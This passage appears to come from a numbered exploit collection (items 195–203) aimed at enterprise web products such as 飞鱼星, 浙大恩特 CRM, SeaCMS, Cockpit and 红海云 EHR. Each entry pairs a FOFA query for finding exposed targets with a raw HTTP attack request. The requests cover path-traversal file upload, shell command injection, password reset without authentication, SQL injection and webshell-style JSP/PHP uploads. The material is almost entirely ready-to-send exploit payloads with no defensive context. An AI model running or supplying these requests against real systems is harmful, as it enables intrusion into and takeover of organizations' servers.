User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) 全媒体 news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt
203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
